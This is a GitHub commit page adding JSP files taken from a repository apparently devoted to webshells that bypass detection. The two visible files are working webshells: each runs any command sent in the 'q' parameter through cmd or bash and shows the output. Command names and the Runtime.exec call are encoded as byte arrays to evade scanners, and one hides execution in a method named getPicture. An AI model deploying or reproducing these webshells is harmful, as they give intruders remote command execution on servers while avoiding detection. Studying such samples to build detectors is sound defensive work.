Add files via upload

from: https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/jsp
author: Build By LandGrey
This commit is contained in:
Levi Li 2018-12-20 11:33:20 +08:00 committed by GitHub
parent a0a4b15bdf
commit 1ee6e0dd74
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
3 changed files with 91 additions and 0 deletions

File diff suppressed because one or more lines are too long

View file

@ -0,0 +1,41 @@
<%@ page pageEncoding="utf-8"%>
<%@ page import="java.util.Scanner" %>
<HTML>
<title>Just For Fun</title>
<BODY>
<H3>Build By LandGrey</H3>
<FORM METHOD="POST" NAME="form" ACTION="#">
<INPUT TYPE="text" NAME="q">
<INPUT TYPE="submit" VALUE="Fly">
</FORM>
<%
String op="Got Nothing";
String query = request.getParameter("q");
String fileSeparator = String.valueOf(java.io.File.separatorChar);
Boolean isWin;
if(fileSeparator.equals("\\")){
isWin = true;
}else{
isWin = false;
}
if (query != null) {
ProcessBuilder pb;
if(isWin) {
pb = new ProcessBuilder(new String(new byte[]{99, 109, 100}), new String(new byte[]{47, 67}), query);
}else{
pb = new ProcessBuilder(new String(new byte[]{47, 98, 105, 110, 47, 98, 97, 115, 104}), new String(new byte[]{45, 99}), query);
}
Process process = pb.start();
Scanner sc = new Scanner(process.getInputStream()).useDelimiter("\\A");
op = sc.hasNext() ? sc.next() : op;
sc.close();
}
%>
<PRE>
<%= op %>>
</PRE>
</BODY>
</HTML>

View file

@ -0,0 +1,43 @@
<%@ page import="java.util.Scanner" pageEncoding="UTF-8" %>
<HTML>
<title>Just For Fun</title>
<BODY>
<H3>Build By LandGrey</H3>
<FORM METHOD=POST ACTION='#'>
<INPUT name='q' type=text>
<INPUT type=submit value='Fly'>
</FORM>
<%!
public static String getPicture(String str) throws Exception{
String fileSeparator = String.valueOf(java.io.File.separatorChar);
if(fileSeparator.equals("\\")){
str = new String(new byte[] {99, 109, 100, 46, 101, 120, 101, 32, 47, 67, 32}) + str;
}else{
str = new String(new byte[] {47, 98, 105, 110, 47, 98, 97, 115, 104, 32, 45, 99, 32}) + str;
}
Class rt = Class.forName(new String(new byte[] { 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 }));
Process e = (Process) rt.getMethod(new String(new byte[] { 101, 120, 101, 99 }), String.class).invoke(rt.getMethod(new String(new byte[] { 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 })).invoke(null, new Object[]{}), new Object[] { str });
Scanner sc = new Scanner(e.getInputStream()).useDelimiter("\\A");
String result = "";
result = sc.hasNext() ? sc.next() : result;
sc.close();
return result;
}
%>
<%
String name ="Input Nothing";
String query = request.getParameter("q");
if(query != null) {
name = getPicture(query);
}
%>
<pre>
<%= name %>
</pre>
</BODY>
</HTML>